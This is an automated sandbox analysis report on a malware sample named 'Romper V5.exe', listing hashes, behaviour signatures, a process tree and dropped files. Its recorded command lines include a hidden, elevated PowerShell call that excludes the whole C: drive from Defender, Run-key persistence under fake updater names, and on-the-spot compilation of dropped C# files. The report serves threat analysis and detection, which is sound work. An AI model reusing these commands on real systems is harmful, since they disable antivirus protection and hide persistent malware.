Analysis
- max time kernel: 145s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20240508-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 01-07-2024 01:13
Behavioral tasks
- behavioral1: sample Romper V5/Romper V5.exe, resource win7-20240221-en
- behavioral2: sample Romper V5/Romper V5.exe, resource win10v2004-20240611-en
- behavioral3: sample Romper V5/Romper V5/Romper V5.exe, resource win7-20240221-en
- behavioral4: sample Romper V5/Romper V5/Romper V5.exe, resource win10v2004-20240508-en
General
- Target: Romper V5/Romper V5/Romper V5.exe
- Size: 30.1MB
- MD5: 20ccae603d435aab174b7b7e46ac7189
- SHA1: c4c34d0a46c2f9532596f6dcb6fb86cc44046ab7
- SHA256: cf675be72d39b1ee645b19bdbebbc615d6787d3f1c0e7ca9e2ef7c4396a7764b
- SHA512: 69658a3e15a9885691098976b89e8e2dd2936cbc78f0f0d58400dbf98fa14c4e170f9180b1ab130cc796b3a4b4245879e8406860770e03f3223a01d25532beb9
- SSDEEP: 786432:GW+e569MZLW+e569MuW+e569MgjW+e5i9M:GW+enhW+enuW+engjW+ev
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTP, 8 IoCs)
  Run Powershell and hide display window.
  Processes:
    pid   process
    4732  powershell.exe
    2788  powershell.exe
    3472  powershell.exe
    952   powershell.exe
    3184  powershell.exe
    2296  powershell.exe
    232   powershell.exe
    1928  powershell.exe
- Checks computer location settings (2 TTPs, 3 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes:
    Key value queried: \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation (cscript.exe)
    Key value queried: \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation (cscript.exe)
    Key value queried: \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation (Romper V5.exe)
- Executes dropped EXE (10 IoCs)
  Processes:
    pid   process
    2020  COOKD.EXE
    4548  CREAL.EXE
    3520  DISCORD.EXE
    4916  COOKD.EXE
    3176  CREAL.EXE
    4316  PYTHON.EXE
    2092  DISCORD.EXE
    4716  PYTHON.EXE
    2920  ChromeUpdater.exe
    1392  ChromeUpdater.exe
- Loads dropped DLL (38 IoCs)
  Processes (count = number of identical rows):
    pid   process      count
    4916  COOKD.EXE    11
    3176  CREAL.EXE    10
    2092  DISCORD.EXE  11
    4716  PYTHON.EXE   6
- Adds Run key to start application (2 TTPs, 3 IoCs)
  Processes:
    Set value (str): \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WindowsUpdater.exe" (DISCORD.EXE)
    Set value (str): \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsStore = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WindowsStore.exe" (CREAL.EXE)
    Set value (str): \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater = "C:\\ProgramData\\ChromeUpdater.exe" (COOKD.EXE)
- Detects Pyinstaller (4 IoCs)
  Processes:
    resource                                       yara_rule
    C:\Users\Admin\AppData\Local\Temp\COOKD.EXE    pyinstaller
    C:\Users\Admin\AppData\Local\Temp\CREAL.EXE    pyinstaller
    C:\Users\Admin\AppData\Local\Temp\DISCORD.EXE  pyinstaller
    C:\Users\Admin\AppData\Local\Temp\PYTHON.EXE   pyinstaller
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Kills process with taskkill (2 IoCs)
  Processes:
    pid   process
    4332  taskkill.exe
    1032  taskkill.exe
- Suspicious behavior: EnumeratesProcesses (19 IoCs)
  Processes (count = number of identical rows):
    pid   process         count
    3472  powershell.exe  2
    4732  powershell.exe  2
    2788  powershell.exe  2
    2296  powershell.exe  3
    952   powershell.exe  3
    3184  powershell.exe  3
    1928  powershell.exe  2
    232   powershell.exe  2
- Suspicious use of AdjustPrivilegeToken (10 IoCs)
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  3472  powershell.exe
    Token: SeDebugPrivilege  4732  powershell.exe
    Token: SeDebugPrivilege  2788  powershell.exe
    Token: SeDebugPrivilege  2296  powershell.exe
    Token: SeDebugPrivilege  952   powershell.exe
    Token: SeDebugPrivilege  3184  powershell.exe
    Token: SeDebugPrivilege  1928  powershell.exe
    Token: SeDebugPrivilege  232   powershell.exe
    Token: SeDebugPrivilege  4332  taskkill.exe
    Token: SeDebugPrivilege  1032  taskkill.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (count = number of identical rows):
    description                       pid   process         target process  count
    PID 3636 wrote to memory of 2020  3636  Romper V5.exe   COOKD.EXE       2
    PID 3636 wrote to memory of 4548  3636  Romper V5.exe   CREAL.EXE       2
    PID 3636 wrote to memory of 3520  3636  Romper V5.exe   DISCORD.EXE     2
    PID 2020 wrote to memory of 4916  2020  COOKD.EXE       COOKD.EXE       2
    PID 3636 wrote to memory of 4316  3636  Romper V5.exe   PYTHON.EXE      2
    PID 4548 wrote to memory of 3176  4548  CREAL.EXE       CREAL.EXE       2
    PID 3520 wrote to memory of 2092  3520  DISCORD.EXE     DISCORD.EXE     2
    PID 4316 wrote to memory of 4716  4316  PYTHON.EXE      PYTHON.EXE      2
    PID 4716 wrote to memory of 3660  4716  PYTHON.EXE      cmd.exe         2
    PID 3176 wrote to memory of 2788  3176  CREAL.EXE       powershell.exe  2
    PID 2092 wrote to memory of 3472  2092  DISCORD.EXE     svchost.exe     2
    PID 4916 wrote to memory of 4732  4916  COOKD.EXE       powershell.exe  2
    PID 3472 wrote to memory of 2296  3472  powershell.exe  powershell.exe  2
    PID 2092 wrote to memory of 4064  2092  DISCORD.EXE     cmd.exe         2
    PID 2788 wrote to memory of 3184  2788  powershell.exe  powershell.exe  2
    PID 4732 wrote to memory of 952   4732  powershell.exe  powershell.exe  2
    PID 4064 wrote to memory of 3340  4064  cmd.exe         csc.exe         3
    PID 4916 wrote to memory of 3692  4916  COOKD.EXE       cmd.exe         2
    PID 3176 wrote to memory of 4864  3176  CREAL.EXE       svchost.exe     2
    PID 4864 wrote to memory of 2196  4864  cmd.exe         csc.exe         3
    PID 3692 wrote to memory of 4632  3692  cmd.exe         WerFault.exe    3
    PID 2196 wrote to memory of 3168  2196  csc.exe         cvtres.exe      3
    PID 3340 wrote to memory of 3588  3340  csc.exe         cvtres.exe      3
    PID 4632 wrote to memory of 1216  4632  csc.exe         svchost.exe     3
    PID 2092 wrote to memory of 3564  2092  DISCORD.EXE     cscript.exe     2
    PID 4916 wrote to memory of 3896  4916  COOKD.EXE       cscript.exe     2
    PID 3896 wrote to memory of 4404  3896  cscript.exe     cmd.exe         2
    PID 3564 wrote to memory of 1692  3564  cscript.exe     cmd.exe         2
    PID 4404 wrote to memory of 3096  4404  cmd.exe         cmd.exe         2
Processes
(process tree; indentation follows the parent/child depth reported by the sandbox)

- [depth 1] C:\Users\Admin\AppData\Local\Temp\Romper V5\Romper V5\Romper V5.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\Romper V5\Romper V5\Romper V5.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - [depth 2] C:\Users\Admin\AppData\Local\Temp\COOKD.EXE
    cmdline: "C:\Users\Admin\AppData\Local\Temp\COOKD.EXE"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    - [depth 3] C:\Users\Admin\AppData\Local\Temp\COOKD.EXE
      cmdline: "C:\Users\Admin\AppData\Local\Temp\COOKD.EXE"
      - Executes dropped EXE
      - Loads dropped DLL
      - Adds Run key to start application
      - Suspicious use of WriteProcessMemory
      - [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell -Command "Start-Process powershell -Verb runAs -ArgumentList \"-Command Set-MpPreference -ExclusionPath c:\\\" -WindowStyle Hidden"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        - [depth 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -ExclusionPath c:\
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
      - [depth 4] C:\Windows\system32\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\ProgramData\ChromeUpdater.exe C:\Users\Admin\AppData\Local\Temp\ChromeUpdater.cs > nul 2>&1
        - Suspicious use of WriteProcessMemory
        - [depth 5] C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\ProgramData\ChromeUpdater.exe C:\Users\Admin\AppData\Local\Temp\ChromeUpdater.cs
          - Suspicious use of WriteProcessMemory
          - [depth 6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES596A.tmp" "c:\ProgramData\CSC70F3AE67E1044FC39083E0D1CB19643B.TMP"
      - [depth 4] C:\Windows\SYSTEM32\cscript.exe
        cmdline: cscript.exe //nologo C:\Users\Admin\AppData\Local\Temp\launch.vbs
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory
        - [depth 5] C:\Windows\System32\cmd.exe
          cmdline: "C:\Windows\System32\cmd.exe" /c start /b C:\Users\Admin\AppData\Local\Temp\temporary.cmd
          - Suspicious use of WriteProcessMemory
          - [depth 6] C:\Windows\system32\cmd.exe
            cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\temporary.cmd
            - [depth 7] C:\Windows\system32\cmd.exe
              cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest https://www.python.org/ftp/python/ -UseBasicParsing | Select-String -Pattern '3.10.[0-9]{1,2}' -AllMatches | Select-Object -ExpandProperty Matches | Select-Object -ExpandProperty Value | Sort-Object -Descending -Unique | Select-Object -First 1"
              - [depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                cmdline: powershell -Command "Invoke-WebRequest https://www.python.org/ftp/python/ -UseBasicParsing | Select-String -Pattern '3.10.[0-9]{1,2}' -AllMatches | Select-Object -ExpandProperty Matches | Select-Object -ExpandProperty Value | Sort-Object -Descending -Unique | Select-Object -First 1"
                - Command and Scripting Interpreter: PowerShell
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
            - [depth 7] C:\Windows\system32\curl.exe
              cmdline: curl -L -o "C:\Users\Admin\AppData\Local\Temp\python-installer.exe" "https://www.python.org/ftp/python/+FullyQualifiedErrorId/python-+FullyQualifiedErrorId-amd64.exe"
            - [depth 7] C:\Windows\system32\taskkill.exe
              cmdline: taskkill /f /im "python-installer.exe"
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
            - [depth 7] C:\ProgramData\ChromeUpdater.exe
              cmdline: "C:\ProgramData\ChromeUpdater.exe"
              - Executes dropped EXE
              - [depth 8] C:\Windows\system32\WerFault.exe
                cmdline: C:\Windows\system32\WerFault.exe -u -p 2920 -s 780
  - [depth 2] C:\Users\Admin\AppData\Local\Temp\CREAL.EXE
    cmdline: "C:\Users\Admin\AppData\Local\Temp\CREAL.EXE"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    - [depth 3] C:\Users\Admin\AppData\Local\Temp\CREAL.EXE
      cmdline: "C:\Users\Admin\AppData\Local\Temp\CREAL.EXE"
      - Executes dropped EXE
      - Loads dropped DLL
      - Adds Run key to start application
      - Suspicious use of WriteProcessMemory
      - [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell -Command "Start-Process powershell -Verb runAs -ArgumentList \"-Command Set-MpPreference -ExclusionPath c:\\\" -WindowStyle Hidden"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        - [depth 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -ExclusionPath c:\
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
      - [depth 4] C:\Windows\system32\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Users\Admin\AppData\Local\Temp\WindowsStore.exe C:\Users\Admin\AppData\Local\Temp\WindowsStore.cs > nul 2>&1
        - Suspicious use of WriteProcessMemory
        - [depth 5] C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Users\Admin\AppData\Local\Temp\WindowsStore.exe C:\Users\Admin\AppData\Local\Temp\WindowsStore.cs
          - Suspicious use of WriteProcessMemory
          - [depth 6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES593C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA4EECB7DA98049BDADFBE211AA54BB8A.TMP"
  - [depth 2] C:\Users\Admin\AppData\Local\Temp\DISCORD.EXE
    cmdline: "C:\Users\Admin\AppData\Local\Temp\DISCORD.EXE"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    - [depth 3] C:\Users\Admin\AppData\Local\Temp\DISCORD.EXE
      cmdline: "C:\Users\Admin\AppData\Local\Temp\DISCORD.EXE"
      - Executes dropped EXE
      - Loads dropped DLL
      - Adds Run key to start application
      - Suspicious use of WriteProcessMemory
      - [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell -Command "Start-Process powershell -Verb runAs -ArgumentList \"-Command Set-MpPreference -ExclusionPath c:\\\" -WindowStyle Hidden"
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        - [depth 5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -ExclusionPath c:\
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
      - [depth 4] C:\Windows\system32\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Users\Admin\AppData\Local\Temp\WindowsUpdater.exe C:\Users\Admin\AppData\Local\Temp\WindowsUpdater.cs > nul 2>&1
        - Suspicious use of WriteProcessMemory
        - [depth 5] C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Users\Admin\AppData\Local\Temp\WindowsUpdater.exe C:\Users\Admin\AppData\Local\Temp\WindowsUpdater.cs
          - Suspicious use of WriteProcessMemory
          - [depth 6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES594B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2BE10D6FC34B989FD9DAC66F23DCCC.TMP"
      - [depth 4] C:\Windows\SYSTEM32\cscript.exe
        cmdline: cscript.exe //nologo C:\Users\Admin\AppData\Local\Temp\launch.vbs
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory
        - [depth 5] C:\Windows\System32\cmd.exe
          cmdline: "C:\Windows\System32\cmd.exe" /c start /b C:\Users\Admin\AppData\Local\Temp\temporary.cmd
          - [depth 6] C:\Windows\system32\cmd.exe
            cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\temporary.cmd
            - [depth 7] C:\Windows\system32\cmd.exe
              cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest https://www.python.org/ftp/python/ -UseBasicParsing | Select-String -Pattern '3.10.[0-9]{1,2}' -AllMatches | Select-Object -ExpandProperty Matches | Select-Object -ExpandProperty Value | Sort-Object -Descending -Unique | Select-Object -First 1"
              - [depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                cmdline: powershell -Command "Invoke-WebRequest https://www.python.org/ftp/python/ -UseBasicParsing | Select-String -Pattern '3.10.[0-9]{1,2}' -AllMatches | Select-Object -ExpandProperty Matches | Select-Object -ExpandProperty Value | Sort-Object -Descending -Unique | Select-Object -First 1"
                - Command and Scripting Interpreter: PowerShell
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
            - [depth 7] C:\Windows\system32\curl.exe
              cmdline: curl -L -o "C:\Users\Admin\AppData\Local\Temp\python-installer.exe" "https://www.python.org/ftp/python/+FullyQualifiedErrorId/python-+FullyQualifiedErrorId-amd64.exe"
            - [depth 7] C:\Windows\system32\taskkill.exe
              cmdline: taskkill /f /im "python-installer.exe"
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
            - [depth 7] C:\ProgramData\ChromeUpdater.exe
              cmdline: "C:\ProgramData\ChromeUpdater.exe"
              - Executes dropped EXE
  - [depth 2] C:\Users\Admin\AppData\Local\Temp\PYTHON.EXE
    cmdline: "C:\Users\Admin\AppData\Local\Temp\PYTHON.EXE"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    - [depth 3] C:\Users\Admin\AppData\Local\Temp\PYTHON.EXE
      cmdline: "C:\Users\Admin\AppData\Local\Temp\PYTHON.EXE"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      - [depth 4] C:\Windows\system32\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c
      - [depth 4] C:\Windows\system32\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c cls
      - [depth 4] C:\Windows\system32\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c
      - [depth 4] C:\Windows\system32\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c cls
      - [depth 4] C:\Windows\system32\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c
      - [depth 4] C:\Windows\system32\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c cls
      - [depth 4] C:\Windows\system32\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c
      - [depth 4] C:\Windows\system32\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c cls
- [depth 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
- [depth 1] C:\Windows\System32\svchost.exe
  cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup
- [depth 1] C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Local\Temp\COOKD.EXE
  Filesize: 7.5MB
  MD5: a4d88d60fdebe4d85736d7684de377d5
  SHA1: 3cd96116e5ee43b28a499ea48eff1533b029d8be
  SHA256: 13611a82912fc262cec5433aeb83c62e6488c5931359749c8a29dcc3bc66c731
  SHA512: 739223bae82b42c55bdabc0e7d94d0f9daf4b130317122a491ad36e34da0f3a6ba30e87ef0aeba4319aded8a156f31ffdbcb803921f208c7e00ea7ee11e144b5
- C:\Users\Admin\AppData\Local\Temp\CREAL.EXE
  Filesize: 7.5MB
  MD5: 2dc33067754eb099bd137180a357088b
  SHA1: 65ec6e077726a462fe96c32f0540891e76cabc4e
  SHA256: 78b6b54a4643d3648f9653cfd9ec89b0d158f586647e7afc1b78113e1b988585
  SHA512: b0073ba54eebfc0afc1ce8c72d9dc87050e434d77f86d2c3d4cfc00c2d84463cd0ab7891e74eaea92de46c934ff13f61202d4f33d6209e45b4b96e064348d7fa
- C:\Users\Admin\AppData\Local\Temp\DISCORD.EXE
  Filesize: 7.4MB
  MD5: 3cc78ec13e19e7deacb003b556afa189
  SHA1: 26f4ce646c930464b07c3eb8d7f888354df0f73b
  SHA256: c11cf38be5e32cf2f7172a47dd93bff04168b4f607a26558d84b90783ba67372
  SHA512: 23bd312a390f7779085732a648026bb06f215ebde483dd1b824b53be03382173b0626be5683860c0c3b806dd081677165b99305ff8990c086231f818f03828b8
- C:\Users\Admin\AppData\Local\Temp\PYTHON.EXE
  Filesize: 7.3MB
  MD5: ac69ea4dae2d61194cedc40f423fc240
  SHA1: 9ec71b517b7e7c36091dbf96fb8eb0577cf0b7f2
  SHA256: aabbc779eef339c207509e4ca1ab3cf82abe780c3a5c2cecf39cb3730de5cf61
  SHA512: 0c224aeccc66a19bc2ab2911c70a7b2a6bbd5c4cc8f57c3001c7e1f6dfb5c2aa310b73e669592a9c3f244d352bff37f5c912ed37a4e860a62ef1a508de1acc8b
- C:\Users\Admin\AppData\Local\Temp\_MEI20202\VCRUNTIME140.dll
  Filesize: 106KB
  MD5: 4585a96cc4eef6aafd5e27ea09147dc6
  SHA1: 489cfff1b19abbec98fda26ac8958005e88dd0cb
  SHA256: a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
  SHA512: d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286
- C:\Users\Admin\AppData\Local\Temp\_MEI20202\_hashlib.pyd
  Filesize: 63KB
  MD5: f495d1897a1b52a2b15c20dcecb84b47
  SHA1: 8cb65590a8815bda58c86613b6386b5982d9ec3f
  SHA256: e47e76d70d508b62924fe480f30e615b12fdd7745c0aac68a2cddabd07b692ae
  SHA512: 725d408892887bebd5bcf040a0ecc6a4e4b608815b9dea5b6f7b95c812715f82079896df33b0830c9f787ffe149b8182e529bb1f78aadd89df264cf8853ee4c4
- C:\Users\Admin\AppData\Local\Temp\_MEI20202\_wmi.pyd
  Filesize: 35KB
  MD5: ee33f4c8d17d17ad62925e85097b0109
  SHA1: 8c4a03531cf3dbfe6f378fdab9699d51e7888796
  SHA256: 79adca5037d9145309d3bd19f7a26f7bb7da716ee86e01073c6f2a9681e33dad
  SHA512: 60b0705a371ad2985db54a91f0e904eea502108663ea3c3fb18ed54671be1932f4f03e8e3fd687a857a5e3500545377b036276c69e821a7d6116b327f5b3d5c1
- C:\Users\Admin\AppData\Local\Temp\_MEI20202\base_library.zip
  Filesize: 1.3MB
  MD5: 3909f1a45b16c6c6ef797032de7e3b61
  SHA1: 5a243f6c8db11bf401aeac69f4c2a0c6cd63b3a8
  SHA256: 56cce68da6a7ebd11aab4b4a4e6a164647b42b29ae57656532c530d1e22e5b44
  SHA512: 647e343eb9732150c0fd12c7142a960ede969b41d5a567940e89636f021f0c0b3249b6cfc99c732190085bcae7aa077f8ac52c8e7fe7817d48a34489f0cd5148
- C:\Users\Admin\AppData\Local\Temp\_MEI20202\python312.dll
  Filesize: 6.6MB
  MD5: 5c5602cda7ab8418420f223366fff5db
  SHA1: 52f81ee0aef9b6906f7751fd2bbd4953e3f3b798
  SHA256: e7890e38256f04ee0b55ac5276bbf3ac61392c3a3ce150bb5497b709803e17ce
  SHA512: 51c3b4f29781bb52c137ddb356e1bc5a37f3a25f0ed7d89416b14ed994121f884cb3e40ccdbb211a8989e3bd137b8df8b28e232f98de8f35b03965cfce4b424f
- C:\Users\Admin\AppData\Local\Temp\_MEI20202\pywin32_system32\pywintypes312.dll
  Filesize: 131KB
  MD5: 26d752c8896b324ffd12827a5e4b2808
  SHA1: 447979fa03f78cb7210a4e4ba365085ab2f42c22
  SHA256: bd33548dbdbb178873be92901b282bad9c6817e3eac154ca50a666d5753fd7ec
  SHA512: 99c87ab9920e79a03169b29a2f838d568ca4d4056b54a67bc51caf5c0ff5a4897ed02533ba504f884c6f983ebc400743e6ad52ac451821385b1e25c3b1ebcee0
- C:\Users\Admin\AppData\Local\Temp\_MEI20202\win32\win32api.pyd
  Filesize: 130KB
  MD5: 3a80fea23a007b42cef8e375fc73ad40
  SHA1: 04319f7552ea968e2421c3936c3a9ee6f9cf30b2
  SHA256: b70d69d25204381f19378e1bb35cc2b8c8430aa80a983f8d0e8e837050bb06ef
  SHA512: a63bed03f05396b967858902e922b2fbfb4cf517712f91cfaa096ff0539cf300d6b9c659ffee6bf11c28e79e23115fd6b9c0b1aa95db1cbd4843487f060ccf40
- C:\Users\Admin\AppData\Local\Temp\_MEI35202\VCRUNTIME140_1.dll
  Filesize: 48KB
  MD5: 7e668ab8a78bd0118b94978d154c85bc
  SHA1: dbac42a02a8d50639805174afd21d45f3c56e3a0
  SHA256: e4b533a94e02c574780e4b333fcf0889f65ed00d39e32c0fbbda2116f185873f
  SHA512: 72bb41db17256141b06e2eaeb8fc65ad4abdb65e4b5f604c82b9e7e7f60050734137d602e0f853f1a38201515655b6982f2761ee0fa77c531aa58591c95f0032
- C:\Users\Admin\AppData\Local\Temp\_MEI35202\_bz2.pyd
  Filesize: 82KB
  MD5: c7ce973f261f698e3db148ccad057c96
  SHA1: 59809fd48e8597a73211c5df64c7292c5d120a10
  SHA256: 02d772c03704fe243c8de2672c210a5804d075c1f75e738d6130a173d08dfcde
  SHA512: a924750b1825747a622eef93331fd764d824c954297e37e8dc93a450c11aa7ab3ad7c3b823b11656b86e64de3cd5d409fda15db472488dfaa4bb50341f0b29d1
- C:\Users\Admin\AppData\Local\Temp\_MEI35202\_decimal.pyd
  Filesize: 247KB
  MD5: 21c73e7e0d7dad7a1fe728e3b80ce073
  SHA1: 7b363af01e83c05d0ea75299b39c31d948bbfe01
  SHA256: a28c543976aa4b6d37da6f94a280d72124b429f458d0d57b7dbcf71b4bea8f73
  SHA512: 0357102bffc2ec2bc6ff4d9956d6b8e77ed8558402609e558f1c1ebc1baca6aeaa5220a7781a69b783a54f3e76362d1f74d817e4ee22aac16c7f8c86b6122390
- C:\Users\Admin\AppData\Local\Temp\_MEI35202\libcrypto-3.dll
  Filesize: 4.9MB
  MD5: 51e8a5281c2092e45d8c97fbdbf39560
  SHA1: c499c810ed83aaadce3b267807e593ec6b121211
  SHA256: 2a234b5aa20c3faecf725bbb54fb33f3d94543f78fa7045408e905593e49960a
  SHA512: 98b91719b0975cb38d3b3c7b6f820d184ef1b64d38ad8515be0b8b07730e2272376b9e51631fe9efd9b8a1709fea214cf3f77b34eeb9fd282eb09e395120e7cb
- C:\Users\Admin\AppData\Local\Temp\_MEI35202\unicodedata.pyd
  Filesize: 1.1MB
  MD5: a1388676824ce6347d31d6c6a7a1d1b5
  SHA1: 27dd45a5c9b7e61bb894f13193212c6d5668085b
  SHA256: 2480a78815f619a631210e577e733c9bafecb7f608042e979423c5850ee390ff
  SHA512: 26ea1b33f14f08bb91027e0d35ac03f6203b4dfeee602bb592c5292ab089b27ff6922da2804a9e8a28e47d4351b32cf93445d894f00b4ad6e2d0c35c6c7f1d89
- C:\Users\Admin\AppData\Local\Temp\_MEI45482\_lzma.pyd
  Filesize: 155KB
  MD5: 4e2239ece266230ecb231b306adde070
  SHA1: e807a078b71c660db10a27315e761872ffd01443
  SHA256: 34130d8abe27586ee315262d69af4e27429b7eab1f3131ea375c2bb62cf094be
  SHA512: 86e6a1eab3529e600dd5caab6103e34b0f618d67322a5ecf1b80839faa028150c492a5cf865a2292cc8584fba008955da81a50b92301583424401d249c5f1401
- C:\Users\Admin\AppData\Local\Temp\_MEI45482\_socket.pyd
  Filesize: 81KB
  MD5: 899380b2d48df53414b974e11bb711e3
  SHA1: f1d11f7e970a7cd476e739243f8f197fcb3ad590
  SHA256: b38e66e6ee413e5955ef03d619cadd40fca8be035b43093d2342b6f3739e883e
  SHA512: 7426ca5e7a404b9628e2966dae544f3e8310c697145567b361825dc0b5c6cd87f2caf567def8cd19e73d68643f2f38c08ff4ff0bb0a459c853f241b8fdf40024
- C:\Users\Admin\AppData\Local\Temp\_MEI45482\select.pyd
  Filesize: 30KB
  MD5: bffff83a000baf559f3eb2b599a1b7e8
  SHA1: 7f9238bda6d0c7cc5399c6b6ab3b42d21053f467
  SHA256: bc71fbdfd1441d62dd86d33ff41b35dc3cc34875f625d885c58c8dc000064dab
  SHA512: 3c0ba0cf356a727066ae0d0d6523440a882aafb3ebdf70117993effd61395deebf179948f8c7f5222d59d1ed748c71d9d53782e16bd2f2eccc296f2f8b4fc948
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f3k5y5jt.tnk.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
